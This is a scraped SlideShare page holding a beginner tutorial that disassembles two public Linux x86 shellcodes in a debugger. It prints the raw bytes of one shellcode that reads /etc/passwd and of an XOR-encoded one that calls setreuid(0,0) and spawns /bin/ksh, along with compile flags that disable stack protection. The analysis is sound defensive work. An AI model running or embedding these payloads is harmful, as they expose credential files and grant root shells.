SlideShare a Scribd company logo
Linux x86 Reverse Engineering
Basic guide of Shellcode Disassembling
Harsh N. Daftary
Sr. Security Researcher at CSPF
Security Consultant at Trunkoz Technologies
info@securityLabs.in
Abstract:--
Most of the Windows as well as Linux based programs contains bugs
or security holes and/or errors. These bugs or error in program can
be exploited in order to crash the program or make system do
unwanted stuff
Exploit usually attacks the program on Memory Corruption,
Segmentation Dump, format string, Buffer overflow or something
else.
In computer security, a shellcode is a small piece of code used as
the payload in the exploitation of a software vulnerability. It is called
"shellcode" because it typically starts a command shell from which
the attacker can control the compromised machine.
It is just a basic guide, not for l33t reverse engineers :)
Introduction:-
Shellcode are not responsible for exploiting but to create a shell
or execute something on victim system after exploiting the bug.
Shellcode can execute almost all the functions that a
independent program could. Execution of this code takes place
after exploiting vulnerability.(usually)
Importance :
By just looking at shellcode we cannot say what it does, As
hackers often uses various shellcodes along with their
respective exploits
We just believe what description of shellcode says and are
ready to run it but, How can we trust it. It can do many other
functions apart from what its description say and it can end up
in compromising our own system, or create backdoor for
shellcode author
So the reverse Engineering Helps us to to get idea of working
of the code.
Basic idea about encryption and x86 structure is required.
General Registers :
32 bits : EAX EBX ECX EDX
16 bits : AX BX CX DX
8 bits : AH AL BH BL CH CL DH
EAX,AX,AH,AL :
Called the Accumulator register.
It is used for I/O port access, arithmetic, interrupt calls.
Segment Registers :
CS DS ES FS GS SS
Segment registers hold the segment address of various items
Index and Pointers:
ESI EDI EBP EIP ESP
idexes and pointer and the offset part of and address. They
have various uses but each register has a specific function.
Test System Specification :
Linux Ubuntu 10.04
Intel i3
System Architecture: x86- 32 bit
NASM assembled shellcode
In this paper I would discuss Reverse Engineering of Two
programs.
1. Simple program that reades /etc/passwd file
2. XOR encrypted shellcode that launches new shell ksh with
setreuid (0,0)
1. Simple program that reads
/etc/passwd file
Shellcode: ( Download Link given in the end )
"x31xc0x99x52x68x2fx63x61x74x68x2fx62x69x6e
x89xe3x52x68x73x73x77x64x68x2fx2fx70x61x68x
2fx65x74x63x89xe1xb0x0bx52x51x53x89xe1xcdx8
0"
Now we create a simple program that will execute this code
and Compile it using
gcc –fno-stack-protector -z execstack code.c –o shellcode
It will compile our code and program should work without any
hindrance.
Lets load our Program into Debugger
Now we set the disassembling structure to intel.
Looking at our source code file we can find that the name of
pointer in which we stored our shellcode is "code"
so we create breakpoint at this pointer and run so at point
we hit our breakpoint that time we disassemble the
program
Debugger Output:
0x0804a040 <+0>: xor eax,eax
--- > It will xor eax with eax, it is used to make eax register 0
0x0804a042 <+2>: cdq
0x0804a043 <+3>: push edx
0x0804a044 <+4>: push 0x7461632f
0x0804a049 <+9>: push 0x7461632f = tac/
0x0804a04e <+14>: mov ebx,esp
--- > Copies the data stored into esp into ebx
0x0804a050 <+16>: push edx
0x0804a051 <+17>: push 0x64777373
0x0804a056 <+22>: push 0x61702f2f
0x0804a05b <+27>: push 0x6374652f
0x0804a060 <+32>: mov ecx,esp
0x0804a062 <+34>: mov al,0xb
--- > loads AL register with (0xb)hex
0x0804a064 <+36>: push edx
0x0804a065 <+37>: push ecx
0x0804a066 <+38>: push ebx
0x0804a067 <+39>: mov ecx,esp
--- > copy data stored in esp into ecx register
0x0804a069 <+41>: int 0x80
--- > Makes a syscall by interrupt 80
0x0804a06b <+43>: add BYTE PTR [eax],al
So now we have to stop just before execution so we create
breakpoint at a place where program makes a syscall i.e. at
address: 0x0804a069
Interrupt 80 makes a syscall with syscall number stored in eax
register,
as we can see by code:
print /x $eax -->> $eax = 11
We need to find function that will start at syscall number 11
so under x86 structure we open :
/usr/src/your linux header/arch/x86/include/asm/unistd_32.h
This file contains list of functions against their syscall numbers
So at 11th number we understand that program is calling
"execve"
Manual of execve :
Now lets examine values stored in other 32 bit registers
ebx i.e. Second argument contains a hex number which
converted into string as /bin/cat
cat is Linux bash command used to read a file
3rd argument i.e. ecx register stores a location of file which
"/bin/cat" will read
so file is 0xbffff3d0: "/etc//passwd"
Program will read /etc/passwd file and then will exit.
2. XOR enecrypted shellcode thats launches new shell ksh
with setreuid (0,0)
Shellcode :
"xebx0dx5ex31xc9xb1x21x80x36x7cx46xe2xfaxeb
x05xe8xeexffxffxffx16x3ax24x4dxa7x4dxb5xb1xfc
x4dxaex16x77x24x2ex14x53x17x0fx14x14x53x1ex
15x12xf5x9fx2ex2fxf5x9dxb1xfc"
Now we create a simple prorgam that will execute this code
and Compile it using
gcc –fno-stackp-protector -z execstack code.c –o shellcode
Importance of this code it to compile our code without any
hindrance.
Lets load our Program into Debugger
Looking at our source code file we can find that the name of
pointer in which we stored our shellcode is "code"
creating breakpoint and analyzing
0x0804a047 <+7>: xorb $0x7c,(%esi)
0x0804a04a <+10>: inc %esi
0x0804a04b <+11>: loop 0x804a047 <code+7>
0x0804a04d <+13>: jmp 0x804a054 <code+20>
Here this lines of code will xor decrypt all the commands till
end with 0x7c and then will jump to 0x804a054
So now we create break point just after XOR decryption
finishes and before it jumps to another memory location for
further execution
As we can compare disassembly output to the previous one,
we can understand all the instructions after 0x0804a04d are
now decrypted So basically XOR decryption is finished, Now
we look at EIP +27 we see that Interrupt 80 is being called for
syscall so we new create our new breakpoint there
Just as Before EAX register contains Syscall Number
EBX and ECX register contains Argument
Syscall Number is 70
And Arguments are 0,0
/usr/src/your linux header/arch/x86/include/asm/unistd_32.h
So Here 1st
argument sets uid and 2nd
argument sets gid
Which in our case both are 0
Means the program here is trying to get the root access
over system.
Now lets create breakpoint where program calls interrupt
80 to make a syscall
Here again we Have Syscall Number 11 that is execve
function as we saw that last time.
And EBX register contains hex data which we convert into
string so we get /bin/ksh
So it means This shellcode is going to first decode it self,
then will try open another shell (KSH) located at /bin/ksh
with root access
If you find anything missing or have any suggestions feel
free to contact me :)
~Regards,
Harsh
info@securitylabs.in
PS :
1. Data associated with PUSH can be directly analyzed by
converting hex into string, but that data/string will be Right-
to-Left.
2. Location of unistd_32.h may be different. Using locate
function may be helpful in finding it.
This is just basic guide, Next paper will be in more detail.
Reference :
1. Vivek ramchandran.
2. J prassanna and Hiren Shah for providing
research platform.
Shellcodes :
1. http://www.shell-
storm.org/shellcode/files/shellcode-809.php
2. http://www.shell-
storm.org/shellcode/files/shellcode-571.php

More Related Content

PDF
Linux Shellcode disassembling
PDF
CyberLink LabelPrint 2.5 Exploitation Process
PDF
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
PDF
Magic Clusters and Where to Find Them - Eugene Pirogov
PPTX
07 - Bypassing ASLR, or why X^W matters
KEY
PDF
Summarized of UNIX Time Sharing System
PDF
Enabling Java 2 Runtime Security with Eclipse Plug-ins - Ted Habeck, Advisory...
Linux Shellcode disassembling
CyberLink LabelPrint 2.5 Exploitation Process
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
Magic Clusters and Where to Find Them - Eugene Pirogov
07 - Bypassing ASLR, or why X^W matters
Summarized of UNIX Time Sharing System
Enabling Java 2 Runtime Security with Eclipse Plug-ins - Ted Habeck, Advisory...

What's hot (20)

PPTX
Penetration testing using python
ODP
Sysprog17
PPT
Unix Programming with Perl 2
PPT
Socket Programming
PDF
Magic Clusters and Where to Find Them 2.0 - Eugene Pirogov
DOCX
Linux 系統程式--第一章 i/o 函式
PPT
Os Vanrossum
KEY
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
PPT
Unix Programming with Perl
PDF
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
ODP
Pycon Sec
PDF
Nodejs 프로그래밍 ch.3
PPTX
Using the Power to Prove
PPTX
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
PPT
Formatul Portable Executable
PDF
IDSECCONF2013 CTF online Write Up
PDF
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
PDF
OpenSSL Basic Function Call Flow
PDF
Remote Command Execution
PDF
ZeroNights: Automating iOS blackbox security scanning
Penetration testing using python
Sysprog17
Unix Programming with Perl 2
Socket Programming
Magic Clusters and Where to Find Them 2.0 - Eugene Pirogov
Linux 系統程式--第一章 i/o 函式
Os Vanrossum
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Unix Programming with Perl
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
Pycon Sec
Nodejs 프로그래밍 ch.3
Using the Power to Prove
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
Formatul Portable Executable
IDSECCONF2013 CTF online Write Up
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
OpenSSL Basic Function Call Flow
Remote Command Execution
ZeroNights: Automating iOS blackbox security scanning
Ad

Similar to Shellcode Disassembling - Reverse Engineering (20)

PDF
Shellcoding in linux
PDF
Buffer Overflow - Smashing the Stack
PPTX
Buffer overflow – Smashing The Stack
PDF
X86 assembly nasm syntax
PPTX
Tranning-2
PPT
Writing Metasploit Plugins
PDF
SFO15-500: VIXL
PPTX
How To Add System Call In Ubuntu OS
PDF
Dive into exploit development
PPT
Troubleshooting Linux Kernel Modules And Device Drivers
PPT
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
PDF
Heap overflows for humans – 101
PDF
N_Asm Assembly arithmetic instructions (sol)
PDF
Shellcoding, an Introduction
PDF
N_Asm Assembly system calls (sol)
PDF
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
PPTX
32 bit and 64 bit Register manipulation
PDF
Strategies to design FUD malware
PPTX
NASM Introduction.pptx
PDF
X86 assembly & GDB
Shellcoding in linux
Buffer Overflow - Smashing the Stack
Buffer overflow – Smashing The Stack
X86 assembly nasm syntax
Tranning-2
Writing Metasploit Plugins
SFO15-500: VIXL
How To Add System Call In Ubuntu OS
Dive into exploit development
Troubleshooting Linux Kernel Modules And Device Drivers
Troubleshooting linux-kernel-modules-and-device-drivers-1233050713693744-1
Heap overflows for humans – 101
N_Asm Assembly arithmetic instructions (sol)
Shellcoding, an Introduction
N_Asm Assembly system calls (sol)
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
32 bit and 64 bit Register manipulation
Strategies to design FUD malware
NASM Introduction.pptx
X86 assembly & GDB
Ad

More from Sumutiu Marius (7)

PDF
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
PDF
Stratfor Forensic Hack Investigation - Verizon
PDF
The Dark Arts of Hacking.
PDF
Hacking Web Aplications using Cookie Poisoning
PDF
BlackHat Hacking - Hacking VoIP.
PDF
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
ODP
Design and Implementation of Shellcodes.
Dragonfly: Cyberespionage Attacks Against Energy Suppliers
Stratfor Forensic Hack Investigation - Verizon
The Dark Arts of Hacking.
Hacking Web Aplications using Cookie Poisoning
BlackHat Hacking - Hacking VoIP.
Hacking Layer 2 - Enthernet Switcher Hacking Countermeasures.
Design and Implementation of Shellcodes.

Recently uploaded (20)

PPT
FIRE PREVENTION AND CONTROL PLAN- LUS.FM.MQ.OM.UTM.PLN.00014.ppt
PPTX
Module 1 - Cyber Law and Ethics 101.pptx
PPT
Design_with_Watersergyerge45hrbgre4top (1).ppt
PPTX
artificial intelligence overview of it and more
PDF
Tenda Login Guide: Access Your Router in 5 Easy Steps
PDF
Unit-1 introduction to cyber security discuss about how to secure a system
PPTX
INTERNET------BASICS-------UPDATED PPT PRESENTATION
PDF
WebRTC in SignalWire - troubleshooting media negotiation
PPT
tcp ip networks nd ip layering assotred slides
PPTX
Introuction about ICD -10 and ICD-11 PPT.pptx
DOCX
Unit-3 cyber security network security of internet system
PPTX
newyork.pptxirantrafgshenepalchinachinane
PPTX
Mathew Digital SEO Checklist Guidlines 2025
PDF
FINAL CALL-6th International Conference on Networks & IOT (NeTIOT 2025)
PDF
Paper PDF World Game (s) Great Redesign.pdf
PPTX
presentation_pfe-universite-molay-seltan.pptx
PPTX
June-4-Sermon-Powerpoint.pptx USE THIS FOR YOUR MOTIVATION
PDF
The New Creative Director: How AI Tools for Social Media Content Creation Are...
PDF
An introduction to the IFRS (ISSB) Stndards.pdf
PDF
Cloud-Scale Log Monitoring _ Datadog.pdf
FIRE PREVENTION AND CONTROL PLAN- LUS.FM.MQ.OM.UTM.PLN.00014.ppt
Module 1 - Cyber Law and Ethics 101.pptx
Design_with_Watersergyerge45hrbgre4top (1).ppt
artificial intelligence overview of it and more
Tenda Login Guide: Access Your Router in 5 Easy Steps
Unit-1 introduction to cyber security discuss about how to secure a system
INTERNET------BASICS-------UPDATED PPT PRESENTATION
WebRTC in SignalWire - troubleshooting media negotiation
tcp ip networks nd ip layering assotred slides
Introuction about ICD -10 and ICD-11 PPT.pptx
Unit-3 cyber security network security of internet system
newyork.pptxirantrafgshenepalchinachinane
Mathew Digital SEO Checklist Guidlines 2025
FINAL CALL-6th International Conference on Networks & IOT (NeTIOT 2025)
Paper PDF World Game (s) Great Redesign.pdf
presentation_pfe-universite-molay-seltan.pptx
June-4-Sermon-Powerpoint.pptx USE THIS FOR YOUR MOTIVATION
The New Creative Director: How AI Tools for Social Media Content Creation Are...
An introduction to the IFRS (ISSB) Stndards.pdf
Cloud-Scale Log Monitoring _ Datadog.pdf

Shellcode Disassembling - Reverse Engineering

  • 1. Linux x86 Reverse Engineering Basic guide of Shellcode Disassembling Harsh N. Daftary Sr. Security Researcher at CSPF Security Consultant at Trunkoz Technologies info@securityLabs.in Abstract:-- Most of the Windows as well as Linux based programs contains bugs or security holes and/or errors. These bugs or error in program can be exploited in order to crash the program or make system do unwanted stuff Exploit usually attacks the program on Memory Corruption, Segmentation Dump, format string, Buffer overflow or something else. In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine. It is just a basic guide, not for l33t reverse engineers :) Introduction:- Shellcode are not responsible for exploiting but to create a shell or execute something on victim system after exploiting the bug. Shellcode can execute almost all the functions that a independent program could. Execution of this code takes place after exploiting vulnerability.(usually) Importance : By just looking at shellcode we cannot say what it does, As hackers often uses various shellcodes along with their respective exploits We just believe what description of shellcode says and are ready to run it but, How can we trust it. It can do many other functions apart from what its description say and it can end up in compromising our own system, or create backdoor for shellcode author So the reverse Engineering Helps us to to get idea of working of the code. Basic idea about encryption and x86 structure is required. General Registers : 32 bits : EAX EBX ECX EDX 16 bits : AX BX CX DX 8 bits : AH AL BH BL CH CL DH EAX,AX,AH,AL : Called the Accumulator register. It is used for I/O port access, arithmetic, interrupt calls. Segment Registers : CS DS ES FS GS SS Segment registers hold the segment address of various items Index and Pointers: ESI EDI EBP EIP ESP idexes and pointer and the offset part of and address. They have various uses but each register has a specific function. Test System Specification : Linux Ubuntu 10.04 Intel i3 System Architecture: x86- 32 bit NASM assembled shellcode In this paper I would discuss Reverse Engineering of Two programs. 1. Simple program that reades /etc/passwd file 2. XOR encrypted shellcode that launches new shell ksh with setreuid (0,0)
  • 2. 1. Simple program that reads /etc/passwd file Shellcode: ( Download Link given in the end ) "x31xc0x99x52x68x2fx63x61x74x68x2fx62x69x6e x89xe3x52x68x73x73x77x64x68x2fx2fx70x61x68x 2fx65x74x63x89xe1xb0x0bx52x51x53x89xe1xcdx8 0" Now we create a simple program that will execute this code and Compile it using gcc –fno-stack-protector -z execstack code.c –o shellcode It will compile our code and program should work without any hindrance. Lets load our Program into Debugger Now we set the disassembling structure to intel. Looking at our source code file we can find that the name of pointer in which we stored our shellcode is "code" so we create breakpoint at this pointer and run so at point we hit our breakpoint that time we disassemble the program Debugger Output: 0x0804a040 <+0>: xor eax,eax --- > It will xor eax with eax, it is used to make eax register 0 0x0804a042 <+2>: cdq 0x0804a043 <+3>: push edx 0x0804a044 <+4>: push 0x7461632f 0x0804a049 <+9>: push 0x7461632f = tac/ 0x0804a04e <+14>: mov ebx,esp --- > Copies the data stored into esp into ebx 0x0804a050 <+16>: push edx 0x0804a051 <+17>: push 0x64777373 0x0804a056 <+22>: push 0x61702f2f 0x0804a05b <+27>: push 0x6374652f 0x0804a060 <+32>: mov ecx,esp 0x0804a062 <+34>: mov al,0xb --- > loads AL register with (0xb)hex 0x0804a064 <+36>: push edx 0x0804a065 <+37>: push ecx 0x0804a066 <+38>: push ebx 0x0804a067 <+39>: mov ecx,esp --- > copy data stored in esp into ecx register 0x0804a069 <+41>: int 0x80 --- > Makes a syscall by interrupt 80 0x0804a06b <+43>: add BYTE PTR [eax],al So now we have to stop just before execution so we create breakpoint at a place where program makes a syscall i.e. at address: 0x0804a069 Interrupt 80 makes a syscall with syscall number stored in eax register, as we can see by code: print /x $eax -->> $eax = 11 We need to find function that will start at syscall number 11 so under x86 structure we open : /usr/src/your linux header/arch/x86/include/asm/unistd_32.h
  • 3. This file contains list of functions against their syscall numbers So at 11th number we understand that program is calling "execve" Manual of execve : Now lets examine values stored in other 32 bit registers ebx i.e. Second argument contains a hex number which converted into string as /bin/cat cat is Linux bash command used to read a file 3rd argument i.e. ecx register stores a location of file which "/bin/cat" will read so file is 0xbffff3d0: "/etc//passwd" Program will read /etc/passwd file and then will exit. 2. XOR enecrypted shellcode thats launches new shell ksh with setreuid (0,0) Shellcode : "xebx0dx5ex31xc9xb1x21x80x36x7cx46xe2xfaxeb x05xe8xeexffxffxffx16x3ax24x4dxa7x4dxb5xb1xfc x4dxaex16x77x24x2ex14x53x17x0fx14x14x53x1ex 15x12xf5x9fx2ex2fxf5x9dxb1xfc" Now we create a simple prorgam that will execute this code and Compile it using gcc –fno-stackp-protector -z execstack code.c –o shellcode Importance of this code it to compile our code without any hindrance. Lets load our Program into Debugger Looking at our source code file we can find that the name of pointer in which we stored our shellcode is "code" creating breakpoint and analyzing 0x0804a047 <+7>: xorb $0x7c,(%esi) 0x0804a04a <+10>: inc %esi 0x0804a04b <+11>: loop 0x804a047 <code+7> 0x0804a04d <+13>: jmp 0x804a054 <code+20>
  • 4. Here this lines of code will xor decrypt all the commands till end with 0x7c and then will jump to 0x804a054 So now we create break point just after XOR decryption finishes and before it jumps to another memory location for further execution As we can compare disassembly output to the previous one, we can understand all the instructions after 0x0804a04d are now decrypted So basically XOR decryption is finished, Now we look at EIP +27 we see that Interrupt 80 is being called for syscall so we new create our new breakpoint there Just as Before EAX register contains Syscall Number EBX and ECX register contains Argument Syscall Number is 70 And Arguments are 0,0 /usr/src/your linux header/arch/x86/include/asm/unistd_32.h
  • 5. So Here 1st argument sets uid and 2nd argument sets gid Which in our case both are 0 Means the program here is trying to get the root access over system. Now lets create breakpoint where program calls interrupt 80 to make a syscall Here again we Have Syscall Number 11 that is execve function as we saw that last time. And EBX register contains hex data which we convert into string so we get /bin/ksh So it means This shellcode is going to first decode it self, then will try open another shell (KSH) located at /bin/ksh with root access If you find anything missing or have any suggestions feel free to contact me :) ~Regards, Harsh info@securitylabs.in PS : 1. Data associated with PUSH can be directly analyzed by converting hex into string, but that data/string will be Right- to-Left. 2. Location of unistd_32.h may be different. Using locate function may be helpful in finding it. This is just basic guide, Next paper will be in more detail. Reference : 1. Vivek ramchandran. 2. J prassanna and Hiren Shah for providing research platform. Shellcodes : 1. http://www.shell- storm.org/shellcode/files/shellcode-809.php 2. http://www.shell- storm.org/shellcode/files/shellcode-571.php